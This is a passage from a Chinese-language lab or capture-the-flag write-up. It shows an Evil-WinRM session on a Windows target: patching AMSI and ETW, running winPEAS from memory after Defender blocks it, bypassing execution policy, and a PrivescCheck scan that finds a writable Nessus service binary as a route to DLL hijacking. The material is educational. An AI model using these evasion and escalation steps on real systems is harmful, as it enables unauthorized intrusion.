------ ----\n-a----        10\/18\/2024   1:41 PM             33 user.txt\n-a----          6\/9\/2025   3:00 AM         472064 winPEAS.exe\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; Bypass-4MSI\n\nInfo: Patching 4MSI, please be patient...\n\n[+] Success!\n\nInfo: Patching ETW, please be patient ..\n\n[+] Success!\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; whoami\nnessus\\nesus\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; services\n\nPath                                                                            Privileges Service          \n----                                                                            ---------- -------          \nC:\\Windows\\gAwFavaS.exe                                                              False fsMT             \nC:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\SMSvcHost.exe                         True NetTcpPortSharing\nC:\\Windows\\SysWow64\\perfhost.exe                                                     False PerfHost         \n&quot;C:\\Program Files\\Windows Defender Advanced Threat Protection\\MsSense.exe&quot;           False Sense            \n&quot;C:\\Program Files\\Tenable\\Nessus\\nessus-service.exe&quot;                                 False Tenable Nessus   \nC:\\Windows\\iAkZGZHW.exe                                                              False tldJ             \nC:\\Windows\\servicing\\TrustedInstaller.exe                                            False TrustedInstaller \n&quot;C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25040.2-0\\NisSrv.exe&quot;        True WdNisSvc         \n&quot;C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\4.18.25040.2-0\\MsMpEng.exe&quot;       True WinDefend<\/code><\/pre>\n<p>\u8fd0\u884c\u4e0d\u4e86\u3002\u3002\u3002\u3002\u3002\u53d7\u4e0d\u4e86\u4e86\uff0c\u6362\u4e00\u4e2a\u7a0d\u5fae\u6df7\u6dc6\u4e00\u70b9\u7684\u5427\u3002\u3002\u3002<\/p>\n<blockquote>\n<p>\u4e2d\u95f4\u53d1\u73b0\u4e0a\u4f20\u7684winpeas\u88ab\u6740\u8fc7\u3002\u3002\u3002<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; upload winPEAS.exe winPEAS.exe\n\nInfo: Uploading \/home\/kali\/temp\/Nessus\/winPEAS.exe to C:\\Users\\nesus\\Desktop\\winPEAS.exe\n\nError: Upload failed. Check filenames or paths: No such file or directory - No such file or directory \/home\/kali\/temp\/Nessus\/winPEAS.exe\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; upload ..\/winPEAS.exe winPEAS.exe\n\nInfo: Uploading \/home\/kali\/temp\/Nessus\/..\/winPEAS.exe to C:\\Users\\nesus\\Desktop\\winPEAS.exe\n\nData: 629416 bytes of 629416 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; dir\n\n    Directory: C:\\Users\\nesus\\Desktop\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----        10\/18\/2024   1:41 PM             33 user.txt\n-a----          6\/9\/2025   3:18 AM         472064 winPEAS.exe\n\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; winPEAS.exe\nThe term &#039;winPEAS.exe&#039; is not recognized as the name of a cmdlet, function, script file, or operable program. Check the spelling of the name, or if a path was included, verify that the path is correct and try again.\nAt line:1 char:1\n+ winPEAS.exe\n+ ~~~~~~~~~~~\n    + CategoryInfo          : ObjectNotFound: (winPEAS.exe:String) [], CommandNotFoundException\n    + FullyQualifiedErrorId : CommandNotFoundException\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; C:\\Users\\nesus\\Desktop\\winPEAS.exe\nProgram &#039;winPEAS.exe&#039; failed to run: Operation did not complete successfully because the file contains a virus or potentially unwanted softwareAt line:1 char:1\n+ C:\\Users\\nesus\\Desktop\\winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.\nAt line:1 char:1\n+ C:\\Users\\nesus\\Desktop\\winPEAS.exe\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : ResourceUnavailable: (:) [], ApplicationFailedException\n    + FullyQualifiedErrorId : NativeCommandFailed\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; invoke-binary -Path &quot;C:\\Users\\nesus\\Desktop\\winPEAS.exe&quot;\n.SYNOPSIS\n    Execute binaries from memory.\n    PowerShell Function: Invoke-Binary\n    Author: Luis Vacas (CyberVaca)\n\n    Required dependencies: None\n    Optional dependencies: None\n.DESCRIPTION\n\n.EXAMPLE\n    Invoke-Binary \/opt\/csharp\/Watson.exe\n    Invoke-Binary \/opt\/csharp\/Binary.exe param1,param2,param3\n    Invoke-Binary \/opt\/csharp\/Binary.exe &#039;param1, param2, param3&#039;\n    Description\n    -----------\n    Function that execute binaries from memory.\n\n*Evil-WinRM* PS C:\\Users\\nesus\\Desktop&gt; invoke-binary \/home\/kali\/temp\/winPEAS.exe\nException calling &quot;Execute&quot; with &quot;1&quot; argument(s): &quot;The input is not a valid Base-64 string as it contains a non-base 64 character, more than two padding characters, or an illegal character among the padding characters. &quot;\nAt line:31 char:1\n+ [Cabesha.Injector]::Execute($argumentos)}\n+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n    + CategoryInfo          : NotSpecified: (:) [], MethodInvocationException\n    + FullyQualifiedErrorId : FormatException<\/code><\/pre>\n<p>\u6362\u4e00\u4e2a<code>.bat<\/code>\u811a\u672c\u53ef\u4ee5\uff0c\u5c31\u662f\u6ca1\u6709\u591a\u5c11\u5f69\u8272\u663e\u793a\uff0c\u770b\u7740\u633a\u522b\u626d\uff0c\u4f46\u662f\u4e0a\u4f20\u4ee5\u540e\u6ca1\u53d1\u73b0\u5565\u5229\u7528\u70b9\uff0c\u53ef\u80fd\u662f\u6211\u4e0d\u592a\u719f\u6089\u5427\uff0c\u6ca1\u6807\u7ea2\u5c31\u770b\u4e0d\u51fa\u6765\u3002\u3002\u3002<\/p>\n<p>\u7136\u540e\u5c31\u662f\u6f2b\u957f\u7684\u8bd5\u9519\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Users\\nesus\\desktop&gt; systeminfo\nsysteminfo.exe : ERROR: Access denied\n    + CategoryInfo          : NotSpecified: (ERROR: Access denied:String) [], RemoteException\n    + FullyQualifiedErrorId : NativeCommandError<\/code><\/pre>\n<p>\u7136\u540e\u53c2\u8003\u4e86\u8fd9\u4e2a\u6587\u7ae0\u8fdb\u884c\u4fe1\u606f\u641c\u96c6\uff1a<a href=\"https:\/\/www.cnblogs.com\/Hekeats-L\/p\/16879325.html\">https:\/\/www.cnblogs.com\/Hekeats-L\/p\/16879325.html<\/a><\/p>\n<blockquote>\n<p>\u7528\u5230\u4e86\u8fd9\u4e2a\u811a\u672c\uff1a<a href=\"https:\/\/github.com\/itm4n\/PrivescCheck\">https:\/\/github.com\/itm4n\/PrivescCheck<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Users\\nesus\\desktop&gt; upload ..\/PrivescCheck.ps1 PrivescCheck.ps1\n\nInfo: Uploading \/home\/kali\/temp\/Nessus\/..\/PrivescCheck.ps1 to C:\\Users\\nesus\\desktop\\PrivescCheck.ps1\n\nData: 280648 bytes of 280648 bytes copied\n\nInfo: Upload successful!\n*Evil-WinRM* PS C:\\Users\\nesus\\desktop&gt; Set-ExecutionPolicy Bypass -Scope process -Force\n*Evil-WinRM* PS C:\\Users\\nesus\\desktop&gt; . .\\PrivescCheck.ps1\n*Evil-WinRM* PS C:\\Users\\nesus\\desktop&gt; Invoke-PrivescCheck\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0043 - Reconnaissance                           \u2503\n\u2503 NAME     \u2503 User identity                                     \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Get information about the current user (name, domain name)   \u2503\n\u2503 and its access token (SID, integrity level, authentication   \u2503\n\u2503 ID).                                                         \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\nName             : NESSUS\\nesus\nSID              : S-1-5-21-2986980474-46765180-2505414164-1001\nIntegrityLevel   : Medium Mandatory Level (S-1-16-8192)\nSessionId        : 0\nTokenId          : 00000000-0002ab27\nAuthenticationId : 00000000-0002a294\nOriginId         : 00000000-00000000\nModifiedId       : 00000000-0002a2b1\nSource           : NtLmSsp (00000000-00000000)\n\n[*] Status: Informational - Severity: None - Execution time: 00:00:00.456\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0043 - Reconnaissance                           \u2503\n\u2503 NAME     \u2503 User groups                                       \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Get information about the groups the current user belongs to \u2503\n\u2503 (name, type, SID).                                           \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\nName                                   Type           SID\n----                                   ----           ---\nNESSUS\\None                            Group          S-1-5-21-2986980474-46765180-2505414164-513\nEveryone                               WellKnownGroup S-1-1-0\nBUILTIN\\Remote Management Users        Alias          S-1-5-32-580\nBUILTIN\\Users                          Alias          S-1-5-32-545\nNT AUTHORITY\\NETWORK                   WellKnownGroup S-1-5-2\nNT AUTHORITY\\Authenticated Users       WellKnownGroup S-1-5-11\nNT AUTHORITY\\This Organization         WellKnownGroup S-1-5-15\nNT AUTHORITY\\Local account             WellKnownGroup S-1-5-113\nNT AUTHORITY\\NTLM Authentication       WellKnownGroup S-1-5-64-10\nMandatory Label\\Medium Mandatory Level Label          S-1-16-8192\n\n[*] Status: Informational - Severity: None - Execution time: 00:00:00.137\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0004 - Privilege Escalation                     \u2503\n\u2503 NAME     \u2503 User privileges                                   \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether the current user is granted privileges that    \u2503\n\u2503 can be leveraged for local privilege escalation.             \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\nName                          State   Description                    Exploitable\n----                          -----   -----------                    -----------\nSeChangeNotifyPrivilege       Enabled Bypass traverse checking             False\nSeIncreaseWorkingSetPrivilege Enabled Increase a process working set       False\n\nName        : fsMT\nDisplayName : fsMT\nImagePath   : C:\\Windows\\gAwFavaS.exe\nUser        : LocalSystem\nStartMode   : Manual\n\nName        : ssh-agent\nDisplayName : OpenSSH Authentication Agent\nImagePath   : C:\\Windows\\System32\\OpenSSH\\ssh-agent.exe\nUser        : LocalSystem\nStartMode   : Disabled\n\nName        : Tenable Nessus\nDisplayName : Tenable Nessus\nImagePath   : &quot;C:\\Program Files\\Tenable\\Nessus\\nessus-service.exe&quot;\nUser        : LocalSystem\nStartMode   : Automatic\n\nName        : tldJ\nDisplayName : tldJ\nImagePath   : C:\\Windows\\iAkZGZHW.exe\nUser        : LocalSystem\nStartMode   : Manual\n\n[*] Status: Informational - Severity: None - Execution time: 00:00:02.166\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0004 - Privilege Escalation                     \u2503\n\u2503 NAME     \u2503 Vulnerable Kernel drivers                         \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether known vulnerable kernel drivers are installed. \u2503\n\u2503 It does so by computing the file hash of each driver and     \u2503\n\u2503 comparing the value against the list provided by             \u2503\n\u2503 loldrivers.io.                                               \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\nWarning: Service: RasGre | Path not found: C:\\Windows\\System32\\drivers\\rasgre.sys\n\n[*] Status: Informational (not vulnerable) - Severity: None - Execution time: 00:00:01.668\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0004 - Privilege Escalation                     \u2503\n\u2503 NAME     \u2503 Service image file permissions                    \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether the current user has any write permissions on  \u2503\n\u2503 a service&#039;s binary or its folder.                            \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\nWarning: QueryServiceStatusEx - The handle is invalid (6)\n\nName              : Tenable Nessus\nDisplayName       : Tenable Nessus\nUser              : LocalSystem\nImagePath         : &quot;C:\\Program Files\\Tenable\\Nessus\\nessus-service.exe&quot;\nStartMode         : Automatic\nType              : Win32OwnProcess\nRegistryKey       : HKLM\\SYSTEM\\CurrentControlSet\\Services\nRegistryPath      : HKLM\\SYSTEM\\CurrentControlSet\\Services\\Tenable Nessus\nStatus            :\nUserCanStart      : False\nUserCanStop       : False\nModifiablePath    : C:\\Program Files\\Tenable\\Nessus\\nessus-service.exe\nIdentityReference : NESSUS\\nesus (S-1-5-21-2986980474-46765180-2505414164-1001)\nPermissions       : AllAccess\n\n[*] Status: Vulnerable - Severity: High - Execution time: 00:00:07.600\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0004 - Privilege Escalation                     \u2503\n\u2503 NAME     \u2503 Service unquoted paths                            \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether there are services configured with an          \u2503\n\u2503 exploitable unquoted path that contains spaces.              \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\n[*] Status: Vulnerable - Severity: Low - Execution time: 00:00:00.030\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0006 - Credential Access                        \u2503\n\u2503 NAME     \u2503 Credential Guard                                  \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether Credential Guard is supported and enabled.     \u2503\n\u2503 Note that when Credential Guard is enabled, credentials are  \u2503\n\u2503 stored in an isolated process (&#039;LsaIso.exe&#039;) that cannot be  \u2503\n\u2503 accessed, even if the kernel is compromised.                 \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\nSecurityServicesConfigured  : (null)\nSecurityServicesRunning     : (null)\nSecurityServicesDescription : Credential Guard is not supported.\nLsaCfgFlagsPolicyKey        : HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\DeviceGuard\nLsaCfgFlagsPolicyValue      : LsaCfgFlags\nLsaCfgFlagsPolicyData       : (null)\nLsaCfgFlagsKey              : HKLM\\SYSTEM\\CurrentControlSet\\Control\\LSA\nLsaCfgFlagsValue            : LsaCfgFlags\nLsaCfgFlagsData             : (null)\nLsaCfgFlagsDescription      : Credential Guard is not configured.\n\n[*] Status: Informational - Severity: None - Execution time: 00:00:00.052\n\n\u250f\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2533\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2513\n\u2503 CATEGORY \u2503 TA0004 - Privilege Escalation                     \u2503\n\u2503 NAME     \u2503 AlwaysInstallElevated                             \u2503\n\u2503 TYPE     \u2503 Base                                              \u2503\n\u2523\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u253b\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u252b\n\u2503 Check whether the &#039;AlwaysInstallElevated&#039; policy is enabled  \u2503\n\u2503 system-wide and for the current user. If so, the current     \u2503\n\u2503 user may install a Windows Installer package with elevated   \u2503\n\u2503 (SYSTEM) privileges.                                         \u2503\n\u2517\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u251b\n\nLocalMachineKey   : HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer\nLocalMachineValue : AlwaysInstallElevated\nLocalMachineData  : (null)\nDescription       : AlwaysInstallElevated is not enabled in HKLM.\n\n# \u5220\u9664\u4e86\u90e8\u5206\u65e0\u7528\u7684\u4fe1\u606f<\/code><\/pre>\n<p>\u53d1\u73b0\u4e86\u4e00\u5904\u6743\u9650\u6bd4\u8f83\u9ad8<code>C:\\Program Files\\Tenable\\Nessus\\nessus-service.exe<\/code>\uff0cAllAccess\u662f\u6743\u9650\u96c6\u5408\u4e2d\u7684<strong>\u5b8c\u5168\u63a7\u5236\u6743\u9650<\/strong>\uff0c\u8986\u76d6\u6240\u6709\u5176\u4ed6\u57fa\u7840\u6743\u9650\uff08\u5982\u8bfb\u53d6\u3001\u5199\u5165\u3001\u6267\u884c\u7b49\uff09\uff0c\u5141\u8bb8\u7528\u6237\u6216\u7ec4\u5bf9\u8d44\u6e90\u8fdb\u884c<strong>\u65e0\u9650\u5236\u64cd\u4f5c<\/strong>\uff0c\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\&gt; cd &quot;C:\\Program Files\\Tenable\\Nessus\\&quot;\n*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; dir\n\n    Directory: C:\\Program Files\\Tenable\\Nessus\n\nMode                 LastWriteTime         Length Name\n----                 -------------         ------ ----\n-a----        10\/18\/2024  10:35 AM              1 .winperms\n-a----          5\/9\/2024  11:30 PM        2471544 fips.dll\n-a----          5\/9\/2024  11:30 PM        5217912 icudt73.dll\n-a----          5\/9\/2024  11:30 PM        1575032 icuuc73.dll\n-a----          5\/9\/2024  11:30 PM        4988536 legacy.dll\n-a----          5\/9\/2024  11:06 PM         375266 License.rtf\n-a----          5\/9\/2024  11:37 PM       11204728 nasl.exe\n-a----          5\/9\/2024  11:31 PM         264824 ndbg.exe\n-a----          5\/9\/2024  11:06 PM             46 Nessus Web Client.url\n-a----          5\/9\/2024  11:33 PM          38520 nessus-service.exe\n-a----          5\/9\/2024  11:37 PM       11143800 nessuscli.exe\n-a----          5\/9\/2024  11:38 PM       11925624 nessusd.exe<\/code><\/pre>\n<p>\u53d1\u73b0\u5b58\u5728\u4e00\u4e9b<code>dll<\/code>\u6587\u4ef6\uff0c\u731c\u6d4b\u53ef\u80fd\u5b58\u5728\u52ab\u6301\u6f0f\u6d1e\uff0c\u770b\u4e00\u4e0b\u6743\u9650\uff1a<\/p>\n<pre><code class=\"language-bash\">*Evil-WinRM* PS C:\\Program Files\\Tenable\\Nessus&gt; icacls &quot;C:\\Program Files\\Tenable\\Nessus\\*&quot;\nC:\\Program Files\\Tenable\\Nessus\\.winperms NT AUTHORITY\\SYSTEM:(I)(F)\n                                          BUILTIN\\Administrators:(I)(F)\n                                          BUILTIN\\Users:(I)(RX)\n                                          NESSUS\\nesus:(I)(F)\n                                          APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)\n                                          APPLICATION PACKAGE AUTHORITY\\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)\n\nC:\\Program Files\\Tenable\\Nessus\\fips.dll NT AUTHORITY\\SYSTEM:(I)(F)\n                                         